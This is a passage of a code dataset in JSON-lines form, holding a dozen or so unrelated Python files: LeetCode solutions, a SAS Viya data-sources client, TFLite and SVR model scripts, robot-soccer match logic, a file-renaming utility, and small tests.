号仅当电话号码中包含国际号码时存在。\r\n例如,一个 12 位的电话号码应当以 \"+**-\" 开头进行显示。\r\n注意:像 \"(\",\")\",\" \" 这样的不相干的字符以及不符合上述格式的额外的减号或者加号都应当被删除。\r\n\r\n\r\n最后,将提供的信息正确隐藏后返回。\r\n\r\n示例 1:\r\n输入: \"LeetCode@LeetCode.com\"\r\n输出: \"l*****e@leetcode.com\"\r\n解释:\r\n所有的名称转换成小写, 第一个名称的第一个字符和最后一个字符中间由 5 个星号代替。\r\n因此,\"leetcode\" -> \"l*****e\"。\r\n\r\n示例 2:\r\n输入: \"AB@qq.com\"\r\n输出: \"a*****b@qq.com\"\r\n解释:\r\n第一个名称\"ab\"的第一个字符和最后一个字符的中间必须有 5 个星号\r\n因此,\"ab\" -> \"a*****b\"。\r\n\r\n示例 3:\r\n输入: \"1(234)567-890\"\r\n输出: \"***-***-7890\"\r\n解释:\r\n10 个数字的电话号码,那意味着所有的数字都是本地号码。\r\n\r\n示例 4:\r\n输入: \"86-(10)12345678\"\r\n输出: \"+**-***-***-5678\"\r\n解释:\r\n12 位数字,2 个数字是国际号码另外 10 个数字是本地号码 。\r\n\r\n注意:\r\nS.length <= 40。\r\n邮箱的长度至少是 8。\r\n电话号码的长度至少是 10。\r\n\"\"\"\r\n\r\n\r\nclass Solution:\r\n def maskPII(self, S):\r\n \"\"\"\r\n :type S: str\r\n :rtype: str\r\n \"\"\"\r\n\r\n if ('@' in S):\r\n email = S.lower().partition('@')\r\n return email[0][0] + '*****' + email[0][-1] + '@' + email[-1]\r\n else:\r\n phone = [n for n in S if n.isdigit()]\r\n p_l = len(phone)\r\n phone_tail = ''.join(phone[-4:])\r\n if (p_l == 10):\r\n return '***-***-' + phone_tail\r\n else:\r\n return '+' + '*' * (p_l - 10) + '-***-***-' + phone_tail\r\n\r\n\r\ns = Solution()\r\nprint(s.maskPII('LeetCode@LeetCode.com'))\r\nprint(s.maskPII('AB@qq.com'))\r\nprint(s.maskPII('1(234)567-890'))\r\nprint(s.maskPII('86-(10)12345678'))\r\n\r\n\"\"\"\r\n此题解法:\r\n* 如果S中有@,那就是邮箱,将邮箱转换成小写用@拆开后,按标准取头尾中间拼接*****\r\n* 反之就是电话号码,将所有的数字过滤出来\r\n* 如果是10个,就是本地号码\r\n* 如果大于10就是国际号码\r\n\"\"\"\r\n","sub_path":"LeetCode/831.py","file_name":"831.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"20792953","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/10/23 11:52 AM\n# @Author : Muximus\n# @Site : \n# @File : sentence_embedding_core.py\n# @Software: PyCharm\nimport os\nimport sys\nimport logging\nimport numpy as np\n\n_root = os.path.normpath(\"%s/..\" % os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(_root)\nlogger = logging.getLogger(__name__)\nfrom utils.dataset import Dataset\nfrom utils.data_helper import find_files, parallel_get_activation_by_model, parallel_data_listener\nfrom functools import partial\n\n\nclass BaseSentenceEmb(object):\n \"\"\"base Sentence Embedding class\n \"\"\"\n\n def __init__(self, model_wrapper: BaseModelWrapper, data_wrapper: RawDataWrapper):\n self.model_wrapper = model_wrapper\n self.data_wrapper = data_wrapper\n\n def predict(self, divide_nums, ndtype=None):\n datas = self.data_wrapper.batch_generator(divide_nums)\n dest_data_files = []\n for i, batch_data in enumerate(datas):\n sentence_emb = self.model_wrapper.predict(batch_data)\n if ndtype is not None:\n sentence_emb = sentence_emb.astype(ndtype)\n dest_data_files.append(sentence_emb)\n logger.info('predict data slice_{} shape:{}'.format(i, sentence_emb.shape))\n logger.info('===PREDICT DONE! len:{}====='.format(len(dest_data_files)))\n return np.concatenate(dest_data_files)\n\n def predict_save(self, dest_dir, prefix, divide_nums):\n datas = self.data_wrapper.batch_generator(divide_nums)\n dest_data_files = []\n for i, batch_data in enumerate(datas):\n sentence_emb = self.model_wrapper.predict(batch_data)\n dest_data_file = '{}/{}_{}'.format(dest_dir, prefix, i)\n np.save(dest_data_file, sentence_emb)\n dest_data_files.append(dest_data_file + '.npy')\n logger.info('export data slice_{} length:{} to: {}'.format(i, len(sentence_emb), dest_dir))\n logger.info('====SAVE DONE!=====')\n return dest_data_files\n\n\ndef emb_and_save(data_dir, file_pattern, saved_data_name, model_dir, feature, word_index, msl, cleanable, layer_index, seps, headers, data_axises, drop_values, drop_axises,\n usecols_all):\n files = find_files(data_dir, file_pattern)\n Dataset.from_files(files, feature, word_index=word_index, msl=msl, find_new_word=False, cleanable=cleanable, qid_index=None, seps=seps,\n headers=headers, data_axises=data_axises, qid_axises=None, label_str_axises=None, drop_values=drop_values, drop_axises=drop_axises,\n usecols_all=usecols_all).reduce(10).map().custom_reduce_map(4, partial(parallel_get_activation_by_model, model_dir=model_dir, layer_index=layer_index),\n partial(parallel_data_listener, kill_sign='kill'))\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"sentence_embedding/sentence_embedding_main.py","file_name":"sentence_embedding_main.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"139554814","text":"# Summation of primes\n\n# The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n# Find the sum of all the primes below two million.\n\ndef is_prime(number):\n if number > 1:\n for i in range(2, number):\n if (number % i) == 0:\n return False\n else:\n return True\n else:\n return False\n\nsum = 2\n\nfor number in range(3, 2000000):\n if number % 2 == 0: continue\n if is_prime(number): sum += number\n\nprint(sum)\n# Time: \n","sub_path":"python/problem10.py","file_name":"problem10.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"501343653","text":"from __future__ import generators\nimport py\n\ndef test_newcode(): \n source = \"i = 3\"\n co = compile(source, '', 'exec') \n code = py.code.Code(co) \n newco = code.new() \n assert co == newco \n\ndef test_ne():\n code1 = py.code.Code(compile('foo = \"bar\"', '', 'exec'))\n assert code1 == code1\n code2 = py.code.Code(compile('foo = \"baz\"', '', 'exec'))\n assert code2 != code1\n\ndef test_newcode_unknown_args(): \n code = py.code.Code(compile(\"\", '', 'exec'))\n py.test.raises(TypeError, 'code.new(filename=\"hello\")')\n\ndef test_newcode_withfilename():\n source = py.code.Source(\"\"\"\n def f():\n def g():\n pass\n \"\"\")\n co = compile(str(source)+'\\n', 'nada', 'exec')\n obj = 'hello'\n newco = py.code.Code(co).new(rec=True, co_filename=obj)\n def walkcode(co):\n for x in co.co_consts:\n if isinstance(x, type(co)):\n for y in walkcode(x):\n yield y\n yield co\n\n names = []\n for code in walkcode(newco):\n assert newco.co_filename == obj\n assert newco.co_filename is obj\n names.append(code.co_name)\n assert 'f' in names\n assert 'g' in names\n\ndef test_newcode_with_filename(): \n source = \"i = 3\"\n co = compile(source, '', 'exec') \n code = py.code.Code(co) \n class MyStr(str): \n pass \n filename = MyStr(\"hello\") \n filename.__source__ = py.code.Source(source) \n newco = code.new(rec=True, co_filename=filename) \n assert newco.co_filename is filename \n s = py.code.Source(newco) \n assert str(s) == source \n\n","sub_path":"code/testing/test_code.py","file_name":"test_code.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"212035335","text":"import os\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n\ndef main():\n names = list(os.listdir('datasets/tianchi_xray/restricted/'))\n img1 = Image.open(os.path.join('datasets/tianchi_xray/restricted', names[random.randint(0, len(names))]))\n img2 = Image.open(os.path.join('datasets/tianchi_xray/restricted', names[random.randint(0, len(names))]))\n\n plt.subplot(2, 2, 1)\n plt.imshow(img1)\n plt.subplot(2, 2, 2)\n plt.imshow(img2)\n\n lambd = 0.5\n\n img1 = np.array(img1, dtype='float32')\n img2 = np.array(img2, dtype='float32')\n height = max(img1.shape[0], img2.shape[0])\n width = max(img1.shape[1], img2.shape[1])\n\n mixed_img = np.zeros(shape=(height, width, 3), dtype='float32')\n mixed_img[:img1.shape[0], :img1.shape[1], :] = img1 * lambd\n mixed_img[:img2.shape[0], :img2.shape[1], :] += img2 * (1. - lambd)\n mixed_img = mixed_img.astype('uint8')\n mixed_img = Image.fromarray(mixed_img)\n\n plt.subplot(2, 2, 3)\n plt.imshow(mixed_img)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/tianchi_xray/mixup_test.py","file_name":"mixup_test.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"292841188","text":"'''\n760. Find Anagram Mappings\n\nGiven two lists Aand B, and B is an anagram of A. B is an anagram of A means B is made by randomizing the order of the elements in A.\n\nWe want to find an index mapping P, from A to B. A mapping P[i] = j means the ith element in A appears in B at index j.\n\nThese lists A and B may contain duplicates. If there are multiple answers, output any of them.\n\nFor example, given\n\nA = [12, 28, 46, 32, 50]\nB = [50, 12, 32, 46, 28]\nWe should return\n[1, 4, 3, 2, 0]\nas P[0] = 1 because the 0th element of A appears at B[1], and P[1] = 4 because the 1st element of A appears at B[4], and so on.\nNote:\n\nA, B have equal lengths in range [1, 100].\nA[i], B[i] are integers in range [0, 10^5].\n'''\n\n\ndef anagramMappings(A, B):\n lst = []\n\n for i in range(0, len(A)):\n key = A[i]\n if key in B:\n lst.append(B.index(key))\n return lst\n\ndef main():\n A = [12, 28, 46, 32, 50]\n B = [50, 12, 32, 46, 28]\n print(anagramMappings(A, B))\n\nif __name__=='__main__':\n main()","sub_path":"python/CodingExercises/LeetCode760.py","file_name":"LeetCode760.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"189905152","text":"#!/usr/bin/env python\n# encoding: utf-8\n#\n# Copyright © 2019, SAS Institute Inc., Cary, NC, USA. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\"Enables retrieval of data source metadata.\n\nThe Data Sources API works in concert with the Data Tables and Row Sets APIs\nto navigate, reference, and retrieve data in the SAS Viya ecosystem. The\nData Sources API enables retrieval of metadata for data sources and linking\nto their respective tables.\n\n\"\"\"\n\nfrom ..core import current_session, get, get_link, request_link, \\\n _build_crud_funcs\n\n_SERVICE_ROOT = '/dataSources'\n\n\ndef is_available():\n \"\"\"Checks if the service is currently available.\n\n Returns\n -------\n bool\n\n \"\"\"\n response = current_session().head(_SERVICE_ROOT + '/')\n return response.status_code == 200\n\n\ndef info():\n \"\"\"Version and build information for the service.\n\n Returns\n -------\n RestObj\n\n \"\"\"\n return get(_SERVICE_ROOT + '/apiMeta')\n\n\nlist_providers, \\\n_, _, _ = _build_crud_funcs(_SERVICE_ROOT + '/providers', 'provider')\n\n\ndef get_provider(provider, refresh=False):\n \"\"\"Returns a provider instance.\n\n Parameters\n ----------\n provider : str or dict\n Name, ID, or dictionary representation of the provider.\n refresh : bool, optional\n Obtain an updated copy of the {item}.\n\n Returns\n -------\n RestObj or None\n A dictionary containing the provider attributes or None.\n\n Notes\n -------\n If `provider` is a complete representation of the provider it will be\n returned unless `refresh` is set. This prevents unnecessary REST calls\n when data is already available on the client.\n\n \"\"\"\n if isinstance(provider, dict) and 'id' in provider:\n if refresh:\n provider = provider['id']\n else:\n return provider\n\n return get(_SERVICE_ROOT + '/providers/{id}'.format(id=provider))\n\n\ndef list_sources(provider):\n \"\"\"List all data sources available for a provider.\n\n Parameters\n ----------\n provider : str or dict\n Name, ID, or dictionary representation of the provider.\n\n Returns\n -------\n list\n A collection of :class:`.RestObj` instances.\n\n \"\"\"\n\n provider = get_provider(provider)\n\n sources = request_link(provider, 'dataSources')\n if isinstance(sources, list):\n return sources\n else:\n return [sources]\n\n\ndef get_source(provider, source):\n \"\"\"Returns a data source belonging to a given provider.\n\n Parameters\n ----------\n provider : str or dict\n Name, ID, or dictionary representation of the provider.\n source : str\n Name or id of the data source\n\n Returns\n -------\n RestObj or None\n A dictionary containing the data source attributes or None.\n\n \"\"\"\n if isinstance(source, dict) and 'providerId' in source:\n return source\n\n sources = list_sources(provider)\n\n for s in sources:\n if source in (s.name, s.id):\n return s\n\n\ndef list_caslibs(source='cas-shared-default', filter=None):\n \"\"\"Get all caslibs registered with the given CAS server.\n\n Parameters\n ----------\n source : str, optional\n Name of the CAS server. Defaults to `cas-shared-default`.\n filter : str, optional\n\n Returns\n -------\n list\n A collection of :class:`.RestObj` instances.\n\n Notes\n -----\n See the filtering_ reference for details on the `filter` parameter.\n\n .. _filtering: https://developer.sas.com/reference/filtering/\n\n \"\"\"\n source = get_source('cas', source)\n\n params = 'filter={}'.format(filter) if filter is not None else {}\n result = request_link(source, 'children', params=params)\n\n return result if isinstance(result, list) else [result]\n\n\ndef get_caslib(name, source=None):\n \"\"\"Get a caslib by name.\n\n Parameters\n ----------\n name : str\n Name of the caslib\n source : str, optional\n Name of the CAS server. Defaults to `cas-shared-default`.\n\n Returns\n -------\n RestObj\n\n \"\"\"\n source = source or 'cas-shared-default'\n caslibs = list_caslibs(source, filter='eq(name, \"%s\")' % name)\n\n # caslibs = [c for c in caslibs if c.name == name]\n\n if len(caslibs):\n return caslibs.pop()\n\n\ndef list_tables(caslib, filter=None):\n \"\"\"List tables available in a caslib.\n\n Parameters\n ----------\n caslib : str or dict\n Name, ID, or dictionary representation of the caslib.\n filter : str, optional\n\n Returns\n -------\n list\n A collection of :class:`.RestObj` instances.\n\n Notes\n -----\n See the filtering_ reference for details on the `filter` parameter.\n\n .. _filtering: https://developer.sas.com/reference/filtering/\n\n \"\"\"\n if not get_link(caslib, 'tables'):\n caslib = get_caslib(caslib)\n\n params = 'filter={}'.format(filter) if filter is not None else {}\n result = request_link(caslib, 'tables', params=params)\n\n return result if isinstance(result, list) else [result]\n\n\n\ndef get_table(name, caslib, server=None):\n \"\"\"Get metadata for a CAS table.\n\n Parameters\n ----------\n name : str\n Name of the table\n caslib : str or dict\n Name, ID, or dictionary representation of the caslib.\n server : str\n Name of the CAS server on which the `caslib` is registered.\n\n Returns\n -------\n RestObj\n\n \"\"\"\n tables = list_tables(caslib, filter='eq(name, \"%s\")' % name)\n\n if len(tables):\n return tables.pop()\n\n\n\n\n","sub_path":"src/sasctl/services/data_sources.py","file_name":"data_sources.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"576117527","text":"import matplotlib.pyplot as plt\nfrom math_linreg2.snippets.data.loader import SawlikePop1M, chunks\n\n\npopulation = SawlikePop1M()\nsamples = chunks(population, 100)\nguys_with_no_13 = [sample[13] for sample in samples]\n\n\n\nplt.subplot(2, 1, 1)\nplt.hist(population, 50)\nplt.ylabel('observation as outcome')\n\nplt.subplot(2, 1, 2)\nplt.hist(guys_with_no_13, 50)\nplt.ylabel('sample as outcome')\n\nplt.show()","sub_path":"source/math_linreg2/snippets/sample_vs_observation.py","file_name":"sample_vs_observation.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"345027961","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2015 hm authors. All rights reserved.\n# Use of this source code is governed by a BSD-style\n# license that can be found in the LICENSE file.\nimport codecs\n\nfrom setuptools import setup, find_packages\n\nfrom rpaas import __version__\n\nREADME = codecs.open('README.rst', encoding='utf-8').read()\n\nsetup(\n name=\"tsuru-rpaas\",\n version=__version__,\n description=\"Reverse proxy as-a-service API for Tsuru PaaS\",\n long_description=README,\n author=\"Tsuru\",\n author_email=\"tsuru@corp.globo.com\",\n classifiers=[\n \"Programming Language :: Python :: 2.7\",\n ],\n packages=find_packages(exclude=[\"docs\", \"tests\"]),\n include_package_data=True,\n install_requires=[\n \"Flask==0.9\",\n \"requests==2.4.3\",\n \"gunicorn==0.17.2\",\n \"tsuru-hm==0.3.0\",\n \"celery[redis]\",\n \"flower==0.7.3\",\n \"GloboNetworkAPI==0.2.2\",\n ],\n extras_require={\n 'tests': [\n \"mock==1.0.1\",\n \"flake8==2.1.0\",\n \"coverage==3.7.1\",\n \"freezegun==0.2.8\",\n ]\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"296139580","text":"import os\nimport entities\nimport algorithms\n\nfrom concurrent import futures\n\nAVAILABLE_COACHES = {\n 'LARC2020Coach': entities.coach.LarcCoach,\n 'Iron2021Coach': entities.coach.IronCoach,\n 'Astar': entities.coach.AstarCoach\n}\n\nclass Match(object):\n def __init__(self, game, team_color, num_robots=3, coach_name=None, category=\"3v3\"):\n super().__init__()\n self.game = game\n self.n_robots = num_robots\n self.coach_name = coach_name\n self.team_color = os.environ.get('TEAM_COLOR', team_color)\n self.category = category\n\n self.opposite_team_color = 'yellow' if self.team_color == 'blue' else 'blue'\n\n \n def start(self):\n self.ball = entities.Ball(self.game)\n\n self.opposites = [\n entities.Robot(self.game, i, self.opposite_team_color) for i in range(self.n_robots)\n ]\n\n self.robots = [\n entities.Robot(self.game, i, self.team_color) for i in range(self.n_robots)\n ]\n\n self.coach = AVAILABLE_COACHES[self.coach_name](self)\n self.coach.decide()\n\n for robot in self.robots:\n robot.start()\n\n def update(self, frame):\n self.ball.update(frame)\n\n for entity in self.opposites:\n entity.update(frame)\n \n for entity in self.robots:\n entity.update(frame)\n\n \n def decide(self):\n commands = []\n '''\n https://docs.python.org/3/library/concurrent.futures.html\n '''\n\n self.coach.decide()\n\n with futures.ThreadPoolExecutor(max_workers=self.n_robots) as executor:\n commands = [\n executor.submit(robot.decide).result() for robot in self.robots\n ]\n \n return commands\n","sub_path":"match/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"452370452","text":"# -*- coding: utf-8 -*-\nimport os, sys, re, unicodedata\n\ndef RDelFiles(CurrentPath, DeleteFile):\n\tglobal DeleteFiles\n\tDeleteFiles = [line.strip() for line in open(CurrentPath + DeleteFile, 'r')]\n\ndef RChgWords(CurrentPath, WordsFile):\n\tglobal AllWords\n\t# print (\"\\nOuverture de : \" + CurrentPath + WordsFile)\n\tAllWords = [line.strip() for line in open(CurrentPath + WordsFile, 'r')]\n\t\ndef remove_accents(input_str):\n\tnfkd_form = unicodedata.normalize('NFKD', input_str)\n\talphanum = u\"\".join([c for c in nfkd_form if not unicodedata.combining(c)])\t# suppress accents\n\talphanum = re.sub('[^0-9a-zA-Z-]', '.', alphanum).lstrip('.')\t\t\t\t\t\t\t# suppress non alphanum\n\treturn re.sub('[.]+', '.', alphanum).rstrip('.')\t\t\t\t\t\t\t\t\t\t\t\t\t# reduce dot\n\ndef Change_Words(input_str):\n\tfor line in AllWords:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# lecture de la table des mots\n\t\tif \";\" in line:\n\t\t\tswords, rwords = line.split(\";\")\n\t\t\t# print (swords, rwords)\n\t\t\tif swords.lower() in input_str.lower():\n\t\t\t\t# print (swords, rwords)\n\t\t\t\tNewString = rwords.join( re.compile(swords, flags=re.I).split(input_str) )\t# replace case insensitive\n\t\t\t\tNewString = re.sub('[.]+', '.', NewString)\n\t\t\t\tinput_str = NewString.rstrip('.')\n\treturn input_str\n\ndef readPath(RootPath):\n\tprint(\"Lecture à partir de -->\" + RootPath)\n\tfor root, dirs, files in os.walk(RootPath, topdown=False):\n\t\tfor dirname in dirs:\n\t\t\t# print (dirname)\n\t\t\ttry:\n\t\t\t\tNewName = Change_Words(remove_accents(dirname))\n\t\t\t\tif dirname != NewName:\n\t\t\t\t\tNameSrc = os.path.join(root, dirname)\n\t\t\t\t\tNameDest = os.path.join(root, NewName)\n\t\t\t\t\tprint (\"old=\", NameSrc)\n\t\t\t\t\tprint (\"New=\", NameDest)\n\t\t\t\t\tos.rename(NameSrc, NameDest)\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\tfor filename in files:\n\t\t\tif filename.lower() in DeleteFiles:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Si fichier à supprimer\n\t\t\t\ttry:\n\t\t\t\t\tprint (\"Delete --> \"+ os.path.join(root, filename))\n\t\t\t\t\tos.remove(os.path.join(root, filename))\n\t\t\t\texcept OSError:\n\t\t\t\t\tpass\n\t\t\telse:\n\t\t\t\t# print(filename)\n\t\t\t\ttry:\n\t\t\t\t\t# NewName = remove_accents(filename)\n\t\t\t\t\tNewName = Change_Words(remove_accents(filename))\n\t\t\t\t\tif filename != NewName:\n\t\t\t\t\t\tNameSrc = os.path.join(root, filename)\n\t\t\t\t\t\tNameDest = os.path.join(root, NewName)\n\t\t\t\t\t\tprint (\"old=\", NameSrc)\n\t\t\t\t\t\tprint (\"New=\", NameDest)\n\t\t\t\t\t\tos.rename(NameSrc, NameDest)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\nCurrentPath = os.path.dirname(sys.argv[0])\t\t\t\t\t\t# Current Path\nWordsFile = \"/ChangeWords.txt\"\t\t\t\t\t\t\t\t\t\t\t\t# mots à remplacer\nDeleteFile = \"/DeleteFiles.txt\"\t\t\t\t\t\t\t\t\t\t\t\t# Fichiers à supprimer\n\nif os.path.isfile(CurrentPath + WordsFile): \t\t\t\t\t# Si fichier présent\n\tRChgWords(CurrentPath, WordsFile)\t\t\t\t\t\t\t\t\t\t# chargement...\nelse:\n\tprint (\"\\nFichier \" + WordsFile + \" non trouvé !\\n\\nArrêt !!\\n\")\n\tsys.exit(1)\n\nif os.path.isfile(CurrentPath + DeleteFile): \t\t\t\t\t# Si fichier présent\n\tRDelFiles(CurrentPath, DeleteFile)\t\t\t\t\t\t\t\t\t# chargement...\nelse:\n\tprint (\"\\nFichier \" + DeleteFile + \" non trouvé !\\n\\nArrêt !!\\n\")\t\n\tsys.exit(1)\n\n\t\nStrPath = sys.argv[1]\nif os.path.exists(StrPath):\n\treadPath(StrPath)\n\t\n","sub_path":"rname.01.py","file_name":"rname.01.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"64959327","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nClassify all the test dataset through our CNN to get accuracy.\n\"\"\"\nimport numpy as np\nimport operator\nimport random\nimport glob\nimport argparse\nimport os.path\nfrom data import DataSet\nfrom processor import process_image\nfrom tensorflow.keras.models import load_model\n#from tensorflow.contrib.lite.python import interpreter as interpreter_wrapper\nfrom tensorflow.lite.python import interpreter as interpreter_wrapper\nfrom tensorflow.keras.preprocessing import image\n\nimport tensorflow as tf\nimport tensorflow.keras.backend as KTF\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth=True #dynamic alloc GPU resource\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.3 #GPU memory threshold 0.3\nsession = tf.Session(config=config)\n\n# set session\nKTF.set_session(session)\n\n\ndef predict(saved_model, image_file):\n interpreter = interpreter_wrapper.Interpreter(model_path=saved_model)\n interpreter.allocate_tensors()\n\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n\n # NxHxWxC, H:1, W:2\n height = input_details[0]['shape'][1]\n width = input_details[0]['shape'][2]\n\n\n img = image.load_img(image_file, target_size=(height, width))\n img = image.img_to_array(img)\n\n # check the type of the input tensor\n if input_details[0]['dtype'] == np.float32:\n #img = preprocess_input(img)\n img = img / 255.\n #img = img/127.5 - 1\n elif input_details[0]['dtype'] == np.uint8:\n img = img.astype(np.uint8)\n\n input_data = np.expand_dims(img, axis=0)\n\n # Predict!\n interpreter.set_tensor(input_details[0]['index'], input_data)\n interpreter.invoke()\n\n output_data = interpreter.get_tensor(output_details[0]['index'])\n return output_data\n\n\n\ndef validate_cnn_model(model_file):\n data = DataSet()\n #model = load_model(model_file)\n\n # Get all our test images.\n images = glob.glob(os.path.join('data', 'test_full', '**', '*.jpg'))\n\n # Count the correct predict\n result_count = 0\n\n for image in images:\n print('-'*80)\n # Get a random row.\n #sample = random.randint(0, len(images) - 1)\n #image = images[sample]\n\n # Get groundtruth class string\n class_str = image.split(os.path.sep)[-2]\n\n # Turn the image into an array.\n print(image)\n #image_arr = process_image(image, (224, 224, 3))\n #image_arr = np.expand_dims(image_arr, axis=0)\n\n # Predict.\n predictions = predict(model_file, image)\n\n # Show how much we think it's each one.\n label_predictions = {}\n for i, label in enumerate(data.classes):\n label_predictions[label] = predictions[0][i]\n\n sorted_lps = sorted(label_predictions.items(), key=operator.itemgetter(1), reverse=True)\n\n # Get top-1 predict class as result\n predict_class_str = sorted_lps[0][0]\n if predict_class_str == class_str:\n result_count = result_count + 1\n\n for i, class_prediction in enumerate(sorted_lps):\n # Just get the top five.\n if i > 4:\n break\n print(\"%s: %.2f\" % (class_prediction[0], class_prediction[1]))\n i += 1\n\n print(\"\\nval_acc: %f\" % (result_count/float(len(images))))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_file', help='model file to predict', type=str)\n\n args = parser.parse_args()\n if not args.model_file:\n raise ValueError('model file is not specified')\n\n validate_cnn_model(args.model_file)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"validate_cnn_tflite.py","file_name":"validate_cnn_tflite.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"136869343","text":"import csv\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.svm import SVR, NuSVR\nfrom sklearn.neighbors import KNeighborsRegressor as KNNR\n\ndef get_RMSE(y, y_predict):\n return ((y-y_predict)**2).mean()\n\ndef run_SVR(filename,svr_model):\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n csv_input = list(reader)\n csv_input.pop(0)\n x_matrix = []\n y_matrix = []\n for i in range(len(csv_input)):\n row=[ float(x) for x in csv_input[i]]\n x_matrix.append(row[0:-1])\n y_matrix.append(row[-1])\n\n x = np.array(x_matrix)\n y = np.array(y_matrix)\n random_permutation_index = np.random.permutation(x.shape[0])\n x = x[random_permutation_index]\n y = y[random_permutation_index]\n\n train_x = x[:-100]\n train_y = y[:-100]\n test_x = x[-100:]\n test_y = y[-100:]\n model = svr_model.fit(train_x, train_y)\n y_train_result = model.predict(train_x)\n print('trainig RMSE = {}'.format(get_RMSE(train_y,y_train_result)))\n y_predict_result = model.predict(test_x)\n print('test RMSE = {}'.format(get_RMSE(test_y,y_predict_result)))\n print()\n return test_y, y_predict_result\n\nsvr_model = SVR(C=1)\nwith open('prediction1.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n y_truth, y_predict = run_SVR('input_2007_w5.csv', svr_model)\n for i in range(len(y_truth)):\n writer.writerow([y_truth[i] ,y_predict[i]])\n\nsvr_model = NuSVR(C=100)\nwith open('prediction2.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n y_truth, y_predict = run_SVR('input_2007.csv', svr_model)\n for i in range(len(y_truth)):\n writer.writerow([y_truth[i] ,y_predict[i]])\n\n\n\n\n\n","sub_path":"dynamodb_interface/ML/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"197584249","text":"import sys\r\naddresses = {}\r\nfp = open('ip-base.txt')\r\nwith fp as f:\r\n for line in f:\r\n addresses.update({line.split(\" \")[0]:line.split(\" \")[1]})\r\n\r\nfor key in addresses:\r\n print(key, addresses[key])\r\n\r\nfp.close()\r\n\r\nn = input(\"Enter 1 if you want to search an ip or 2 if you want to search a domain: \")\r\n\r\nip =\"\"\r\ndomain=\"\"\r\nout=\"\"\r\n\r\nif n=='1':\r\n ip = input(\"Enter an ip:\")\r\n out=addresses.get(ip,\"domain not found\")\r\n if out!=\"\":\r\n print(\"Domain name is: \" +out)\r\n else:\r\n sys.exit(\"Domain not found!\")\r\nelif n=='2':\r\n domain = input(\"Enter a domain: \")+\"\\n\"\r\n found = False\r\n for key in addresses:\r\n if domain == addresses[key]:\r\n print(\"IP address is: \"+key)\r\n found = True\r\n\r\nelse:\r\n sys.exit(\"Wrong input!\")","sub_path":"practice_1/ip_resolver_search.py","file_name":"ip_resolver_search.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"99216125","text":"from common import TreeNode\n\nclass Solution(object):\n def findBottomLeftValue(self, root):\n row = [root]\n last_row = []\n \n while len(row) > 0:\n new_row = []\n for node in row:\n if (node.left):\n new_row.append(node.left)\n if (node.right):\n new_row.append(node.right)\n last_row = row\n row = new_row\n \n return last_row[0].val\n","sub_path":"LeetCode/p513.py","file_name":"p513.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"133332385","text":"#!/usr/bin/python3\n''' Define the Square class.\n\n Attributes:\n Square -- class representing a Square\n'''\n\n\nclass Square():\n ''' Represent a square. '''\n def __init__(self, size=0):\n ''' Initialize an instance of a square.\n\n Args:\n size -- Length of square's sides.\n\n Exceptions:\n -- Raise TypeError if size is not an int\n -- Raise ValueError if size is negative\n '''\n if type(size) is not int:\n raise TypeError('size must be an integer')\n elif size < 0:\n raise ValueError('size must be >= 0')\n else:\n self._Square__size = 